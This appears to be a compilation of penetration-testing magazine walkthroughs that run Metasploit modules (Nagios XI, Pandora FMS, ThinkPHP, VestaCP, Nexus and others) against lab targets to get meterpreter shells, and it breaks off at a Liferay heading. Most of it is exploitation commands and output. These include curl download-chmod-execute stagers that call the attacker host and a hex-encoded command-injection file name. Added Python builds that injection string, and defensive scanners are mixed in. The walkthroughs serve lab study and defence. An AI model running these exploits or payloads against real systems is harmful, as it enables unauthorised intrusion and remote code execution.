Set the required options as shown below.
[Screenshot: rhosts set to the Windows 7 target and lhost set to the attacker's IP address]
Then executing the module gives us a meterpreter session as shown below.
msf5 exploit(multi/http/phpstudy_backdoor_rce) > run
[run output: reverse handler started, stage sent, meterpreter session opened]
meterpreter > sysinfo
Computer    : ADMIN-PC
OS          : Windows NT ADMIN-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
meterpreter >
Nagios XI Authenticated RCE Exploit Module
TARGET: Nagios XI < 5.6.6    TYPE: Remote    FIREWALL: N
Nagios is open-source software used to monitor systems, networks and infrastructure. It can monitor servers, switches, applications and services, and alerts users when things go wrong and again when the problem has been resolved.
The above mentioned versions suffer from a remote code execution vulnerability that can be exploited if credentials are known. Let us see how this exploit works. We tested this on Nagios XI 5.6.5 installed on a CentOS minimal system. Let's set up the target. Install a minimal CentOS 7 system and download Nagios XI 5.6.5 onto the target system. Extract the archive as shown below.
[Screenshot: curl download of the Nagios XI 5.6.5 archive, tar extraction, and running the installer]
This script will do a complete install of Nagios XI by executing all necessary sub-scripts. Only run this on a clean install of CentOS/RHEL, Debian, or Oracle. Do NOT use this on a system that has been tasked with other purposes or has an existing install of Nagios Core. To create such a clean install you should have selected only the base package in the OS installer.
[Installer output, abridged: checking MySQL credentials, installing the Nagios repo package nagios-repo-7-3.el7.noarch.rpm, ...]
After some time, the installation finishes as shown below.
[Installer output: installation complete; you can access the Nagios XI web interface by visiting the URL shown]
Now go to the above highlighted URL and change the password of the nagiosadmin user.
nagiosadmin is the default admin user of Nagios XI. The target is set. Now, start Metasploit and load the nagios_xi_authenticated_rce module as shown below.
msf5 > use exploit/linux/http/nagios_xi_authenticated_rce
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_authenticated_rce):
[options table: PASSWORD (required, password for the nagiosadmin user), Proxies, RHOSTS (required), RPORT 80, SRVHOST 0.0.0.0, SRVPORT 8080, SSL false, SSLCert, TARGETURI /, URIPATH, USERNAME nagiosadmin, VHOST]
Payload options (linux/x64/meterpreter/reverse_tcp):
[LHOST (required, the listen address), LPORT 4444 (the listen port)]
Set the required options and use the check command to confirm whether the target is vulnerable or not.
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > set rhosts 192.168.36.145
rhosts => 192.168.36.145
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > set password <nagiosadmin password>
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > set lhost 192.168.36.128
lhost => 192.168.36.128
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > check
[*] 192.168.36.145:80 - The target appears to be vulnerable. Target is Nagios XI with version 5.6.5.
Then executing the module gives us a meterpreter session as shown below.
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.36.128:4444
[*] Found Nagios XI application with version 5.6.5.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Executing plugin...
[*] Sending stage (...) to 192.168.36.145
[*] Meterpreter session 1 opened (192.168.36.128:4444 -> 192.168.36.145:...) at 2020-05-23 12:39:06 -0400
[!] Failed to delete the malicious 'check_ping' plugin: Connection failed. Manual removal is necessary.

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : ...
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: ... (uid=..., euid=0, egid=...)
meterpreter >

Two things in this output deserve attention. The effective uid is 0: the uploaded check_ping plugin is executed with root privileges, so an authenticated Nagios XI administrator account is worth a full compromise of the monitoring host. And the module was unable to delete the plugin it uploaded, so the malicious check_ping stays in the Nagios plugin directory until it is removed by hand. Note it for cleanup on an engagement; on the defending side, a freshly modified check_ping in that directory is the artifact to look for.

All your doubts, queries and questions about ethical hacking and penetration testing can be sent to [email protected], or reach us at our Facebook page Hackercool Magazine, or tweet us at @hackercoolmagz.
Pandora 7.0NG Authenticated RCE Exploit Module

TARGET: Pandora FMS <= 7.0NG    TYPE: Remote    FIREWALL : Not Applicable

Pandora FMS stands for Pandora Flexible Monitoring System. It is software used for monitoring computer networks: it allows monitoring the different operating systems, servers, applications etc. in a network in a visual way.

In the above mentioned versions of the software, there is an authenticated remote code execution vulnerability in the net_tools.php component (the ping function of its network tools page does not sanitize the host it is asked to ping). Let us see how this exploit works. The download information for the vulnerable target is given in our git repository. The target is an OVF and can be imported into any virtualization software. Load the OVF and start the virtual machine. The target is set. Let's follow the usual scanning process with Nmap as shown below.
hackercoolmagz@kali:~$ nmap -sV 192.168.36.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 07:52 EDT
Nmap scan report for 192.168.36.149
Host is up (0.00095s latency).
Not shown: ... closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     ...
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open  mysql   MySQL (unauthorized)
8022/tcp open  http    Pandora FMS (timezone: +0200)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap identifies Pandora FMS on port 8022, but the Apache server on port 80 is the one serving the console. Let's use the whatweb tool to find out what is running on it.

hackercoolmagz@kali:~$ whatweb 192.168.36.149
http://192.168.36.149 [200 OK] Apache[2.4.6], HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[192.168.36.149], Meta-Refresh-Redirect[...], PHP[5.4.16], ...
http://192.168.36.149/... [200 OK] Apache[2.4.6], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[192.168.36.149], PHP[5.4.16], ...

The port 80 site meta-refreshes to the Pandora FMS console, which sets a PHPSESSID cookie.
Search for the Pandora module in Metasploit. The one we need is exploit/linux/http/pandora_ping_cmd_exec.

msf5 > search pandora
...
   exploit/linux/http/pandora_ping_cmd_exec   ...
...

msf5 > use exploit/linux/http/pandora_ping_cmd_exec
msf5 exploit(linux/http/pandora_ping_cmd_exec) > show options

Module options (exploit/linux/http/pandora_ping_cmd_exec):

   Name       Current Setting   Required  Description
   ----       ---------------   --------  -----------
   PASSWORD   pandora           yes       The password to authenticate with
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                yes       The target port (TCP)
   SRVHOST    0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080              yes       The local port to listen on.
   SSL        false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /pandora_console  yes       The base path to Pandora FMS
   URIPATH                      no        The URI to use for this exploit (default is random)
   USERNAME   admin             yes       The username to authenticate with
   VHOST                        no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Set the required options as shown below and run check.

msf5 exploit(linux/http/pandora_ping_cmd_exec) > set rhosts 192.168.36.149
rhosts => 192.168.36.149
msf5 exploit(linux/http/pandora_ping_cmd_exec) > set lhost 192.168.36.128
lhost => 192.168.36.128
msf5 exploit(linux/http/pandora_ping_cmd_exec) > check
[*] 192.168.36.149:80 - The target appears to be vulnerable.
After all the options are set, execute the module.

msf5 exploit(linux/http/pandora_ping_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.36.128:4444
[*] Exploiting...
[*] Using URL: http://0.0.0.0:8080/kafcjzmw
[*] Local IP: http://192.168.36.128:8080/kafcjzmw
[*] Attempting to authenticate using (admin:pandora)
...
[*] Client 192.168.36.149 (Wget/1.14 (linux-gnu)) requested /kafcjzmw
[*] Sending payload to 192.168.36.149 (Wget/1.14 (linux-gnu))
[*] Sending stage (980808 bytes) to 192.168.36.149
[*] Meterpreter session 1 opened (192.168.36.128:4444 -> 192.168.36.149:...) at ...
[*] Command Stager progress - 100.00% done (150/150 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.36.149
OS           : CentOS 7.3.1611 (Linux 3.10.0-514.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: no-user @ pandorafms (uid=..., gid=..., euid=..., egid=48)
meterpreter >

We get a meterpreter session as shown above. Note that the module logged in with the Pandora defaults admin:pandora, which this OVF still uses; set USERNAME and PASSWORD if the target was reconfigured. Note also that the target fetched the payload with wget over HTTP from our SRVPORT (8080) before connecting back to LPORT, so both paths have to be open. Finally, gid 48 is the apache group on CentOS: the shell runs as the web server user, not as root.
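The vulnerability class the pandora_ping_cmd_exec module abuses is a web "ping" helper that pastes the host parameter into a shell command. The following is an added example, not Pandora FMS code: the function names and the sample inputs are made up, and it shows the vulnerable build beside the hardened one (allow-listed value, argv list, no shell), including the argument-injection case a character filter alone would miss.

```python
# Added example (not Pandora FMS code): command injection in a web "ping"
# helper, vulnerable form beside the hardened form. Names are illustrative.
import re

# Constructed inputs: one legitimate host and several injection attempts.
SAMPLE_HOSTS = [
    "192.168.36.1",
    "192.168.36.1; id",
    "$(id)",
    "`id`",
    "-f",            # not a shell metacharacter, but a ping option (flood)
]

_SHELL_META = re.compile(r"[;&|`$(){}<>\n\\\"']")


def build_ping_vulnerable(host: str) -> str:
    """Vulnerable: the request parameter is pasted into a shell command
    string, so ';', '$(...)' and friends are interpreted by the shell."""
    return f"ping -c 1 {host}"


def shell_would_inject(cmdline: str) -> bool:
    """True when a shell would run something other than a single ping."""
    return bool(_SHELL_META.search(cmdline))


# Hostnames/IPs only: letters, digits, dots and inner hyphens. The first
# character must be alphanumeric so the value can never look like an option.
_HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.\-]{0,252})$")


def validate_host(host: str) -> bool:
    return bool(_HOST_RE.match(host))


def build_ping_hardened(host: str) -> list:
    """Hardened: allow-list the value, then build an argv list. With no shell
    involved there is nothing to inject into, and '--' ends option parsing so
    even a value like '-f' could only ever be treated as an operand."""
    if not validate_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", "--", host]


def triage(hosts) -> dict:
    """For each input: does the vulnerable build get injected, and does the
    hardened build accept it? Returned as {host: (injected, accepted)}."""
    result = {}
    for h in hosts:
        injected = shell_would_inject(build_ping_vulnerable(h))
        try:
            build_ping_hardened(h)
            accepted = True
        except ValueError:
            accepted = False
        result[h] = (injected, accepted)
    return result


if __name__ == "__main__":
    for host, (injected, accepted) in triage(SAMPLE_HOSTS).items():
        print(f"{host!r:22} vulnerable build injected={injected}  hardened accepts={accepted}")
```

The "-f" case is the one to remember: it contains no shell metacharacter, so a blocklist passes it, yet pasted into the command line it becomes a ping flood flag. The allow-list plus "--" closes both the shell and the option-parsing hole.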
ThinkPHP Multiple PHP Injection Module

TARGET: ThinkPHP <= 5.0.23    TYPE: Remote    FIREWALL : Not Applicable

ThinkPHP is a popular PHP framework that enables rapid development of web applications. The above mentioned versions of ThinkPHP are vulnerable to at least two PHP injection vulnerabilities.

This module exploits either of these vulnerabilities to grab a shell. At the time of writing, these vulnerabilities are still being exploited in the wild. Let us see how this exploit works. We have tested this module on version 5.0.23 in vulhub. Vulhub is a collection of vulnerable software packaged as docker containers. Let's set up the target: clone the vulhub repository and bring up its ThinkPHP 5.0.23 environment with docker-compose.

remote: Enumerating objects: 19, done.
remote: Counting objects: 100% (19/19), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 9063 (delta 3), reused 10 (delta 1), pack-reused 9044
Receiving objects: 100% (9063/9063), 124.80 MiB | 1.47 MiB/s, done.
Resolving deltas: 100% (3530/3530), done.
Updating files: 100% (1287/1287), done.
...
(docker-compose pulls the image layers and starts the container)
Load the thinkphp module as shown below.

msf5 > use exploit/unix/webapp/thinkphp_rce
msf5 exploit(unix/webapp/thinkphp_rce) > show options

Module options (exploit/unix/webapp/thinkphp_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to ThinkPHP
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Set the required options. The vulhub container listens on port 80, so RPORT has to be changed from its default; SRVPORT is moved to 8888 so that it does not clash with the target's own 8080 mapping.
msf5 exploit(unix/webapp/thinkphp_rce) > set rhosts 172.18.0.2
rhosts => 172.18.0.2
msf5 exploit(unix/webapp/thinkphp_rce) > set rport 80
rport => 80
msf5 exploit(unix/webapp/thinkphp_rce) > set lhost 172.18.0.1
lhost => 172.18.0.1
msf5 exploit(unix/webapp/thinkphp_rce) > set srvport 8888
srvport => 8888
msf5 exploit(unix/webapp/thinkphp_rce) > check
[*] 172.18.0.2:80 - The target appears to be vulnerable. ThinkPHP 5.0.23 is a vulnerable version.
On executing the module, we successfully get a meterpreter session.

msf5 exploit(unix/webapp/thinkphp_rce) > run

[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Using URL: http://0.0.0.0:8888/SidDKm4BXHu
[*] Local IP: http://172.18.0.1:8888/SidDKm4BXHu
[*] Client 172.18.0.2 (curl/7.52.1) requested /SidDKm4BXHu
[*] Sending payload to 172.18.0.2 (curl/7.52.1)
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:43234) at 2020-06-01 13:51:16 -0400
[*] curl -so /tmp/WxRhvxia http://172.18.0.1:8888/SidDKm4BXHu; chmod +x /tmp/WxRhvxia; /tmp/WxRhvxia; rm -f /tmp/WxRhvxia
[*] Command Stager progress - 100.0% done (114/114 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : b9966ca7c1bf
OS           : ...
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: no-user @ b9966ca7c1bf (uid=33, gid=33, euid=33, egid=33)
meterpreter >

The command the stager ran is visible in the output: the target's own curl downloads the payload from our SRVPORT into /tmp, marks it executable, runs it and deletes it. uid 33 is www-data on Debian-based images, so the session runs as the web server user inside the container (hostname b9966ca7c1bf).
Vesta CP RCE 0day Module

TARGET: Vesta CP    TYPE: Remote    FIREWALL : Not Applicable

VestaCP is an open source website control panel which is very powerful. It provides website, email, domain name server and database functionality, all controlled through a simple web-based interface.

With VestaCP, users can install more than 439 apps with a one-click installer. It is popular due to its light weight, resource-friendliness and simple installation procedure. Here we will install it on a fresh Ubuntu Server 18.04.

The vestacp_exec module is an authenticated module which exploits a command injection vulnerability in the v-list-user-backups bash script. Any user with low privileges can use it to grab a shell on the target. Now let's see how to install VestaCP on a new Ubuntu server.

Log in to the Ubuntu server, download the install script of Vesta Control Panel and run it. Around 15 minutes later the installation finishes. Note the username and password displayed at the end; they are needed to log in. The IP address may differ depending on the network adapter we assign to the virtual machine; since we have set a NAT adapter, it takes an IP address from that. Go to the IP address and log in to the Vesta control panel.

We have logged in as the admin user. However, to test this module we need a user with low privileges, so let's create a new user (user2). After entering all the details, click on "Add" and the new user is created. Log out as admin and log in as the newly created user. The target is set. Now load the vestacp_exec module.
msf5 > use exploit/linux/http/vestacp_exec
msf5 exploit(linux/http/vestacp_exec) > show options

Module options (exploit/linux/http/vestacp_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8083             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to VestaCP
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    yes       The username to login with
   VHOST                       no        HTTP server virtual host

Payload options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Set the required options: the target, the credentials of the low-privileged user, and the listener addresses. SRVHOST is set explicitly because the target must fetch the second stage from it.

msf5 exploit(linux/http/vestacp_exec) > set rhosts 192.168.36.150
rhosts => 192.168.36.150
msf5 exploit(linux/http/vestacp_exec) > set username user2
username => user2
msf5 exploit(linux/http/vestacp_exec) > set password <password of user2>
password => ...
msf5 exploit(linux/http/vestacp_exec) > set lhost 192.168.36.128
lhost => 192.168.36.128
msf5 exploit(linux/http/vestacp_exec) > set srvhost 192.168.36.128
srvhost => 192.168.36.128
msf5 exploit(linux/http/vestacp_exec) > run
...
[*] Exploit completed, but no session was created.

The first run completed without a session. This is not a failure: the injected command only runs when VestaCP's scheduled backup processes the planted file name, which can take several minutes. Run the module again.
msf5 exploit(linux/http/vestacp_exec) > run

[*] Started reverse TCP handler on 192.168.36.128:4444
[+] 192.168.36.150:21 - Successfully authenticated to the FTP service
[+] 192.168.36.150:21 - ...
[+] 192.168.36.150:8083 - Cookie and CSRF token values successfully retrieved
[+] 192.168.36.150:8083 - ...
[*] 192.168.36.150:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 192.168.36.150:8083 - Scheduled backup has been started !
[*] 192.168.36.150:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.36.150:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.36.150:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
(the line repeats every 30 seconds until the backup job picks up the file)
[+] 192.168.36.150:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 192.168.36.150
[*] Meterpreter session 1 opened (192.168.36.128:4444 -> 192.168.36.150:56766) at 2020-05-31 10:15:17 -0400
[+] 192.168.36.150:8083 - ... Enjoy the shells <3
[!] 192.168.36.150:8083 - This exploit may require manual cleanup of '/home/user2/...a'; $(perl${IFS}-e${IFS}'system(pack(qq,H114,,qq,6375726c202d73534c20687474703a2f2f3139322e3136382e33362e3132383a383038302f6c7a766c3954755135756b737a6371207c207368,))')...'
[!] 192.168.36.150:8083 - This exploit may require manual cleanup of '/usr/local/v...'

msf5 exploit(linux/http/vestacp_exec) > sessions -l

Active sessions
===============

  Id  Name  Type         Information  Connection
  --  ----  ----         -----------  ----------
  1         meterpreter  ...          192.168.36.128:4444 -> 192.168.36.150:56766 (192.168.36.150)

The output also explains how the injection works. The module logs in to the FTP service as user2 and creates a file whose name contains a command substitution; when the scheduled backup runs, the v-list-user-backups script evaluates that name and the substitution executes. The name uses ${IFS} in place of spaces and perl's pack() to carry the real command as hex, so that it needs no quotes or spaces of its own: the 114 hex digits decode to "curl -sSL http://192.168.36.128:8080/lzvl9TuQ5ukszcq | sh", the first stage that fetched the payload from our SRVHOST. Both files named in the cleanup warnings, the planted one under /home/user2 and the one under /usr/local/v..., must be removed by hand after the test.
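To see the injection string rather than guess at it, here is an added example, not the vestacp_exec module's code, that builds the same quote-free construct for an arbitrary command and decodes one back from a cleanup message. PAGE_HEX is the hex from the module's cleanup warning above with its OCR errors corrected; the cleanup message below is a constructed stand-in for that line, and the "legitimate backup name" used for comparison is made up.

```python
# Added example, not the vestacp_exec module's code: build and decode the
# quote-free command-injection string that the module plants as a backup
# file name. PAGE_HEX is the hex from the module's cleanup warning above.
import re
from typing import Optional

PAGE_HEX = (
    "6375726c202d73534c20687474703a2f2f3139322e3136382e33362e3132383a"
    "383038302f6c7a766c3954755135756b737a6371207c207368"
)


def build_payload(cmd: str) -> str:
    """Wrap a command so that a bash script which evaluates the file name
    (here: v-list-user-backups) runs it.
    - $(...) is command substitution;
    - ${IFS} replaces every space, so the name contains none;
    - pack(qq,H<n>,,qq,<hex>,) turns the hex back into bytes inside perl, and
      the qq,...,  quoting keeps double quotes out of the perl program."""
    hexcmd = cmd.encode().hex()
    return "$(perl${IFS}-e${IFS}'system(pack(qq,H%d,,qq,%s,))')" % (len(hexcmd), hexcmd)


_PACK_RE = re.compile(r"pack\(qq,H(\d+),,qq,([0-9a-fA-F]+),\)")


def decode_payload(text: str) -> Optional[str]:
    """Recover the hidden command from a file name or a cleanup message.
    Returns None when no pack(...) construct is present."""
    m = _PACK_RE.search(text)
    if not m:
        return None
    n, hexcmd = int(m.group(1)), m.group(2)
    if n != len(hexcmd):
        raise ValueError("H%d does not match %d hex digits" % (n, len(hexcmd)))
    return bytes.fromhex(hexcmd).decode()


def suspicious_backup_name(name: str) -> bool:
    """Defender-side check for names in a user's backup directory: a genuine
    backup name never contains substitution or IFS constructs."""
    return any(tok in name for tok in ("$(", "`", "${IFS}", ";"))


# Constructed stand-in for the cleanup line printed by the module above.
CLEANUP_MESSAGE = (
    "This exploit may require manual cleanup of '/home/user2/a'; "
    "$(perl${IFS}-e${IFS}'system(pack(qq,H114,,qq," + PAGE_HEX + ",))')'"
)

if __name__ == "__main__":
    print(decode_payload(CLEANUP_MESSAGE))   # the curl ... | sh first stage
    print(build_payload("id"))
```

Decoding the cleanup warning gives back the curl pipeline that pulled the second stage from SRVHOST:SRVPORT, which is also why the module needs SRVHOST set to an address the target can reach. The suspicious_backup_name() check is the cheap thing a defender can run over /home/*/backup listings.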
Nexus Repository Manager Injection RCE Module

TARGET: Nexus <= 3.21.1    TYPE: Remote    FIREWALL : Not Applicable

Nexus is a repository manager that hosts artifact repositories for formats such as Maven, APT and Go modules. This module exploits a Java Expression Language (EL) injection vulnerability present in Nexus up to the above mentioned version. The vulnerability allows an authenticated attacker to execute code on the target.

Let's test this exploit module. For this, we will install a docker version of the target. The target's version is 3.21.1.

hackercoolmagz@kali:~$ sudo docker run -d -p 8081:8081 --name nexus sonatype/nexus3:3
Unable to find image 'sonatype/nexus3:3' locally
...
Status: Downloaded newer image for sonatype/nexus3:3
47e7d78e79f3...

Once the container is up, we need to grab the initial administrator password; the image writes it to /nexus-data/admin.password inside the container, so read it with docker exec:

hackercoolmagz@kali:~$ sudo docker exec nexus cat /nexus-data/admin.password

We will need this password to log in. Once you have it, open a browser and go to localhost on port 8081.
Enter the username and password when the login prompt pops up. The username is "admin". The setup wizard then asks you to choose a new (and simple) password for the admin user. At the next prompt, "Configure Anonymous Access", click on "Next" right away; the wizard then reports that setup is complete. The target is set. Load the nexus_repo_manager_el_injection exploit module as shown below.
msf5 > use exploit/linux/http/nexus_repo_manager_el_injection
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > show options

Module options (exploit/linux/http/nexus_repo_manager_el_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8081             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to Nexus Repository Manager
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Set the required options as shown below. The target is the container's IP address on the docker bridge, and the password is the one chosen in the setup wizard.

msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set rhosts 172.17.0.3
rhosts => 172.17.0.3
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set password <new admin password>
password => ...
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set lhost 172.17.0.1
lhost => 172.17.0.1
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > check
[*] 172.17.0.3:8081 - The target appears to be vulnerable.

After all the required options are set, execute the module as shown below.
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Using URL: http://0.0.0.0:8080/...
[*] Local IP: http://172.17.0.1:8080/...
[+] Logged in with NXSESSIONID=a33e9892-804e-4e6a-bdb8-70920489891c;
...
[+] Successfully executed command: curl -so /tmp/mCUSmEdE http://172.17.0.1:...
[*] Client 172.17.0.3 (curl/7.61.1) requested /@sAjH79QyJ0Zk
[*] Sending payload to 172.17.0.3 (curl/7.61.1)
[+] Successfully executed command: ...
[*] Command Stager progress - 71.68% done (81/113 bytes)
[+] Successfully executed command: ...
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:46346) at 2020-06-.. 11:50:34 -0400
[+] Successfully executed command: ...
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 47e7d78e79f3
OS           : Red Hat Enterprise Linux 8 (Linux 5.4.0-kali3-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: no-user @ 47e7d78e79f3 (uid=200, gid=200, euid=200, egid=200)
meterpreter >

As you can see above, we have a meterpreter session. The EL injection is executed one command at a time, which is why the stager reports several "Successfully executed command" lines before the session opens. The OS line shows the kernel of the Kali host because the container shares it; uid 200 is the unprivileged nexus account of the image, so the session is confined to that user inside the container.
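Both the ThinkPHP and the Nexus runs above show the same command stager chain on the target: curl downloads the payload into /tmp, chmod marks it executable, it runs, and it is deleted. That chain is also what a defender can look for. The following is an added example, not code from Metasploit or from either target: it scans constructed process-command records for the chain. The two stager lines are rebuilt from the runs above (the Nexus URL's port and path are only partly readable there, so that line is an assumption); the remaining lines are filler, and the "curl | sh" case mirrors the VestaCP first stage.

```python
# Added example, not Metasploit or target code: flag the download-chmod-run-
# delete chain of the curl/wget command stager in process-command records.
# SAMPLE_LOG is constructed; the first two lines are rebuilt from the runs.
import re
from typing import Dict, List

# One record per line: "<pid> <user> <command line>"
SAMPLE_LOG = """\
1031 www-data curl -so /tmp/WxRhvxia http://172.18.0.1:8888/SidDKm4BXHu; chmod +x /tmp/WxRhvxia; /tmp/WxRhvxia; rm -f /tmp/WxRhvxia
1044 nexus curl -so /tmp/mCUSmEdE http://172.17.0.1:8080/sAjH79QyJ0Zk; chmod +x /tmp/mCUSmEdE; /tmp/mCUSmEdE; rm -f /tmp/mCUSmEdE
1050 root curl -sSL https://updates.invalid/install.sh | sh
1051 www-data /usr/sbin/php-fpm7.0 --nodaemonize
1052 backup wget -q http://mirror.invalid/db.tar.gz -O /var/backups/db.tar.gz
"""

# curl/wget writing to a local path: "-so PATH", "-o PATH", "-O PATH", "-qO PATH"
_DOWNLOAD_RE = re.compile(r"^(?:curl|wget)\b.*?\s-[A-Za-z]*[oO]\s+(\S+)")
# curl/wget piped straight into a shell (no file dropped, nothing to chmod)
_PIPE_TO_SHELL_RE = re.compile(r"\b(?:curl|wget)\b[^;]*\|\s*(?:ba|da)?sh\b")


def parse_record(line: str) -> Dict[str, object]:
    pid, user, cmdline = line.split(" ", 2)
    return {"pid": int(pid), "user": user, "cmdline": cmdline}


def stager_indicators(cmdline: str) -> Dict[str, object]:
    """Split on ';' and look for the four stages the stager chains together."""
    segments = [s.strip() for s in cmdline.split(";") if s.strip()]
    ind = {"download_to": None, "chmod": False, "exec": False, "cleanup": False,
           "pipe_to_shell": bool(_PIPE_TO_SHELL_RE.search(cmdline))}
    for seg in segments:
        m = _DOWNLOAD_RE.match(seg)
        if m:
            ind["download_to"] = m.group(1)
            break
    path = ind["download_to"]
    if path:
        esc = re.escape(path)
        for seg in segments:
            if re.fullmatch(r"chmod\s+\+x\s+" + esc, seg):
                ind["chmod"] = True
            elif seg == path:
                ind["exec"] = True
            elif re.fullmatch(r"rm\s+(?:-f\s+)?" + esc, seg):
                ind["cleanup"] = True
    return ind


def severity(ind: Dict[str, object]) -> str:
    if ind["download_to"] and ind["chmod"] and ind["exec"]:
        return "high"      # the full stager chain
    if ind["pipe_to_shell"]:
        return "medium"    # curl ... | sh, as in the VestaCP first stage
    return "none"


def scan(log: str) -> List[Dict[str, object]]:
    """Return one finding per record that matches, with the dropped path."""
    findings = []
    for line in log.splitlines():
        rec = parse_record(line)
        ind = stager_indicators(rec["cmdline"])
        sev = severity(ind)
        if sev != "none":
            findings.append({"pid": rec["pid"], "user": rec["user"], "severity": sev,
                             "dropped": ind["download_to"], "self_deleted": ind["cleanup"]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

The user column matters as much as the pattern: a web-server or service account (www-data, nexus) fetching and executing a file from /tmp is the signal here, whereas a plain download to a backup directory by the backup user scores nothing. The self_deleted flag records that the dropped file will not be on disk by the time anyone looks, so the command line itself is the evidence to keep.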
Liferay Portal Java Unmarshalling RCE Module

TARGET: Liferay Portal < 6.2 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2    TYPE: Remote

